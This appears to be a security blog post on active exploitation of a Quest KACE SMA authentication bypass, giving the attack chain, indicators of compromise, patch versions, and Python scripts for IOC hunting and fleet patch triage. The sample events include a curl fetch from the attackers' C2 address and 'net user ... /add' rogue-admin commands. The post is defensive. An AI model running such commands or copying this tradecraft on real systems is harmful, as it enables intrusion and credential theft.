CVSS 10.0 Quest KACE SMA Bug Is Being Actively Exploited — Attackers Are Already at Your Domain Controllers
title: "CVSS 10.0 Quest KACE SMA Bug Is Being Actively Exploited — Attackers Are Already at Your Domain Controllers"
slug: "cve-2025-32975-quest-kace-sma-active-exploitation"
tags: ["vulnerability", "active-exploitation", "endpoint-management", "ransomware", "cvss-10"]
A maximum-severity authentication bypass in Quest KACE Systems Management Appliance has moved from "patch when you can" to "patch right now or assume you're breached." Arctic Wolf started seeing active exploitation in customer environments the week of March 9, 2026. By the time attackers are done, they're sitting on your domain controllers and backup infrastructure.
Here's what's happening, and what you need to do about it.
The Vulnerability
CVE-2025-32975 is an authentication bypass in Quest KACE SMA's Single Sign-On handling. CVSS 10.0 — the maximum score. Unauthenticated attackers can impersonate legitimate users without valid credentials, which means complete administrative takeover of the appliance. No foothold required. No phishing. Just a network path to an exposed management interface.
Quest patched this in May 2025. That's ten months ago. Organizations running unpatched, internet-exposed instances are still getting hit today.
The affected version range covers most of the install base:
- KACE SMA 13.x: patch to 13.0.385, 13.1.81, or 13.2.183
- KACE SMA 14.x: apply Patch 5 (14.0.341) or Patch 4 (14.1.101)
What the Attackers Are Actually Doing
This isn't a smash-and-grab. The post-compromise behavior Arctic Wolf documented is pre-ransomware playbook, executed methodically.
After bypassing authentication, attackers use KACE's native `KPluginRunProcess` functionality to run remote commands — Base64-encoded payloads pulled via curl from their C2 server at `216.126.225[.]156`. They're using the appliance's own tooling against you, which makes detection harder.
Then they abuse `runkbot.exe` — a legitimate SMA background process — to create unauthorized admin accounts. Not a new binary dropped on disk. A trusted process, now creating rogue users. They add those accounts to local and domain administrator groups.
Persistence comes via two PowerShell scripts: `Enable-UpdateServices.ps1` and `taskband.ps1`, which modify registry settings to survive reboots. Again, native tooling, named to look like routine maintenance.
Once they're established, Mimikatz runs disguised as `asd.exe` to harvest plaintext credentials from memory. From there it's reconnaissance — `net time`, `net group`, logged-in user enumeration — before pivoting via RDP to wherever those credentials get them.
Where are they pivoting? Domain controllers. And backup infrastructure. Veeam. Veritas. Both reported by Arctic Wolf.
If you're wondering what comes next in that attack chain — it's ransomware, or data destruction, or both. Attackers don't bother hitting backup servers unless they're planning to make recovery painful.
Why This Keeps Happening
The patch was available for nearly a year. The gap between "Quest releases fix" (May 2025) and "Arctic Wolf sees active exploitation" (March 9, 2026) is almost exactly ten months. That's not an edge case timeline — that's standard enterprise patch lag for on-premises appliances that require change control windows, compatibility testing, and maintenance schedules.
KACE SMA manages endpoints across your organization. It handles software deployment, patch distribution, configuration management. It's trusted by design. An attacker who controls it controls what gets pushed to every managed endpoint. The blast radius isn't just the appliance — it's everything the appliance manages.
That's why attackers are targeting it. That's why the CVSS score is 10.0.
Indicators of Compromise
If you're running KACE SMA and want to know if you've already been hit, start here:
- Outbound curl requests to `216.126.225[.]156` from the appliance
- Unauthorized admin account creation via `runkbot.exe`
- PowerShell scripts named `Enable-UpdateServices.ps1` or `taskband.ps1`
- Presence of `asd.exe` (Mimikatz wrapper)
- Unexpected `net time` and `net group` commands in logs
- New RDP sessions to domain controllers or Veeam/Veritas hosts originating from the KACE SMA host
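The IOC list above translates directly into a first-pass hunt. What follows is an added example, not code from the Arctic Wolf report, Quest, or CybrPulse: it runs rule-based matching over a handful of constructed, pipe-delimited process and connection events. The event format, the hostnames (kace-sma01, dc01, veeam01 and so on), and the account-creation command patterns attributed to `runkbot.exe` are assumptions made for the example; the article does not say how the rogue accounts were created, so adapt that rule to whatever your EDR actually records.

```python
import re

# IOCs taken from the Arctic Wolf findings quoted in the article.
C2_IP = "216.126.225.156"
PERSISTENCE_SCRIPTS = ("enable-updateservices.ps1", "taskband.ps1")
MIMIKATZ_ALIAS = "asd.exe"

# Environment-specific values: constructed assumptions for this example.
KACE_HOSTS = {"kace-sma01"}
TIER0_HOSTS = {"dc01", "dc02", "veeam01", "veritas01"}
RDP_PORT = "3389"

# Assumed ways a process might create or elevate an account (not from the article).
ACCOUNT_CHANGE = re.compile(
    r"\bnet(?:\.exe)?\s+(?:user|localgroup|group)\b.*\s/add\b"
    r"|\b(?:New-LocalUser|Add-LocalGroupMember|New-ADUser|Add-ADGroupMember)\b",
    re.IGNORECASE,
)
# Recon commands named in the article.
RECON = re.compile(r"\bnet(?:\.exe)?\s+(?:time|group)\b", re.IGNORECASE)


def classify_proc(host, parent, image, cmdline):
    """Return the name of the first matching IOC rule for a process event, or None."""
    image_l = image.lower()
    cmd_l = cmdline.lower()
    if "curl" in image_l and C2_IP in cmdline:
        return "c2_curl_download"          # appliance pulling payloads from the C2
    if parent.lower() == "runkbot.exe" and ACCOUNT_CHANGE.search(cmdline):
        return "runkbot_account_change"    # trusted SMA process creating admins
    if any(name in cmd_l for name in PERSISTENCE_SCRIPTS):
        return "persistence_script"        # maintenance-looking PowerShell scripts
    if image_l.endswith(MIMIKATZ_ALIAS):
        return "mimikatz_alias"            # Mimikatz renamed to asd.exe
    if RECON.search(cmdline):
        return "recon_net_cmd"             # net time / net group after cred theft
    return None


def classify_conn(src, dst, dport):
    """RDP from the appliance to a DC or backup host is the lateral-movement IOC."""
    if src.lower() in KACE_HOSTS and dst.lower() in TIER0_HOSTS and dport == RDP_PORT:
        return "rdp_from_kace_to_tier0"
    return None


def hunt(lines):
    """Parse pipe-delimited events and return (timestamp, rule, host, detail) hits.

    Constructed format: ts|proc|host|parent|image|cmdline
                        ts|conn|src|dst|dport|proto
    """
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("|")
        if len(fields) < 6:
            continue  # malformed line: skip rather than abort the whole hunt
        ts, kind, host = fields[0], fields[1], fields[2]
        if kind == "proc":
            rule, detail = classify_proc(host, fields[3], fields[4], fields[5]), fields[5]
        elif kind == "conn":
            rule, detail = classify_conn(host, fields[3], fields[4]), f"{host}->{fields[3]}:{fields[4]}"
        else:
            rule, detail = None, ""
        if rule:
            hits.append((ts, rule, host, detail))
    return hits


def affected_hosts(hits):
    """Hosts that need isolation and credential rotation, for IR scoping."""
    return sorted({h[2] for h in hits})


# Constructed sample events: the first seven mirror the article's attack chain,
# the last two are routine activity that must not alert.
SAMPLE_EVENTS = [
    "2026-03-10T03:14:07Z|proc|kace-sma01|sh|curl|curl -s http://216.126.225.156/u",
    "2026-03-10T03:15:22Z|proc|ws-042|runkbot.exe|net.exe|net user svc_update Winter2026! /add",
    "2026-03-10T03:15:23Z|proc|ws-042|runkbot.exe|net.exe|net localgroup administrators svc_update /add",
    r"2026-03-10T03:16:01Z|proc|ws-042|cmd.exe|powershell.exe|powershell -File C:\Windows\Temp\Enable-UpdateServices.ps1",
    r"2026-03-10T03:20:45Z|proc|ws-042|cmd.exe|C:\Windows\Temp\asd.exe|asd.exe",
    "2026-03-10T03:21:10Z|proc|ws-042|cmd.exe|net.exe|net group /domain",
    "2026-03-10T03:25:00Z|conn|kace-sma01|dc01|3389|tcp",
    r"2026-03-10T08:00:00Z|proc|ws-042|runkbot.exe|msiexec.exe|msiexec /i C:\ProgramData\deploy\agent.msi /qn",
    "2026-03-10T08:05:00Z|conn|ws-042|fileserver01|445|tcp",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(*hit, sep="  ")
    print("hosts to isolate:", affected_hosts(hunt(SAMPLE_EVENTS)))
```

The rules are ordered so that the highest-confidence IOC wins when a line matches several, and a `runkbot.exe` child that is doing normal package deployment falls through without alerting. Point `hunt()` at an exported EDR or syslog extract in the same shape and the `affected_hosts()` output becomes the isolation list for your IR team.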
What to Do Right Now
If you haven't patched: Stop reading, open a maintenance window. Apply 13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, or 14.1.101 Patch 4 depending on your version. Then get the SMA management interface off the public internet — it should never be internet-exposed. Put it behind a VPN or restrict it to internal access only.
If you're already patched but internet-exposed: Still a problem. Patching doesn't retroactively remove your attack surface. Take it offline.
If you think you may have been compromised: Assume credential theft. Rotate passwords for all accounts with any access path through the KACE SMA. Audit admin group membership on your domain controllers. Hunt for the IOCs above. Engage your IR team now, not after you see ransomware notes.
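The fixed builds listed under The Vulnerability and the decision rules in this section are easy to get wrong across a fleet of appliances on different minor branches. This is an added example, not a Quest tool or anything from the advisory: it compares an installed version string against the fixed build for its own major.minor branch (the article's numbers, as given) and maps the result plus internet exposure to the action the article prescribes. The inventory rows, the action strings, and the handling of branches the article does not list (reported as unknown rather than guessed) are assumptions for the example.

```python
# Fixed builds named in the article, keyed by major.minor branch.
FIXED_BUILDS = {
    (13, 0): (13, 0, 385),
    (13, 1): (13, 1, 81),
    (13, 2): (13, 2, 183),
    (14, 0): (14, 0, 341),  # 14.0 Patch 5
    (14, 1): (14, 1, 101),  # 14.1 Patch 4
}

# Action strings are constructed for this example; they paraphrase the article.
ACTION_PATCH = "patch now, then take the management interface off the internet and hunt for IOCs"
ACTION_REMOVE_EXPOSURE = "patched but internet-exposed: take the management interface off the internet"
ACTION_OK = "patched and internal-only: verify the version and keep monitoring"
ACTION_VERIFY = "branch not covered here: confirm against Quest's advisory before deciding"


def parse_version(text):
    """Turn 'major.minor.build' into a comparable tuple; reject anything else."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised KACE SMA version string: {text!r}")
    return tuple(int(p) for p in parts)


def patch_status(installed):
    """'patched', 'vulnerable', or 'unknown-branch' for CVE-2025-32975.

    Comparison is only meaningful within one minor branch: 13.1.81 is fixed
    while 13.0.380 is not, even though 380 > 81.
    """
    version = parse_version(installed)
    fixed = FIXED_BUILDS.get(version[:2])
    if fixed is None:
        return "unknown-branch"
    return "patched" if version >= fixed else "vulnerable"


def triage(installed, internet_exposed):
    """Combine patch state with exposure into the article's recommended action."""
    status = patch_status(installed)
    if status == "unknown-branch":
        return ACTION_VERIFY
    if status == "vulnerable":
        return ACTION_PATCH
    return ACTION_REMOVE_EXPOSURE if internet_exposed else ACTION_OK


# Lower number = deal with it first.
_PRIORITY = {ACTION_PATCH: 0, ACTION_REMOVE_EXPOSURE: 1, ACTION_VERIFY: 2, ACTION_OK: 3}


def triage_fleet(rows):
    """rows: iterable of (hostname, version, internet_exposed).

    Returns (hostname, status, action) sorted so vulnerable and exposed
    appliances come first; an exposed vulnerable box outranks an internal one.
    """
    result = []
    for host, version, exposed in rows:
        status = patch_status(version)
        action = triage(version, exposed)
        result.append((host, status, action, exposed))
    result.sort(key=lambda r: (_PRIORITY[r[2]], not r[3], r[0]))
    return [(host, status, action) for host, status, action, _ in result]


# Constructed inventory for the example.
SAMPLE_INVENTORY = [
    ("kace-sma01", "13.1.80", True),    # vulnerable and on the internet
    ("kace-sma02", "14.0.341", True),   # patched but still exposed
    ("kace-lab", "13.2.183", False),    # patched, internal only
    ("kace-old", "12.1.5", False),      # branch the article does not cover
    ("kace-dr", "14.1.90", False),      # vulnerable, internal only
]

if __name__ == "__main__":
    for host, status, action in triage_fleet(SAMPLE_INVENTORY):
        print(f"{host:12} {status:15} {action}")
```

Feed `triage_fleet()` the appliance list from your CMDB and the first rows are your maintenance-window order. A version string that does not parse raises rather than silently passing, which is the right failure mode for a check that decides whether a box stays on the internet.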
The CybrPulse feed flagged this story at priority 8.8 — consistent with other CVSS 10.0 vulnerabilities we track under active exploitation. This is the kind of bug that ends up in breach disclosure filings three months from now. Don't let it be yours.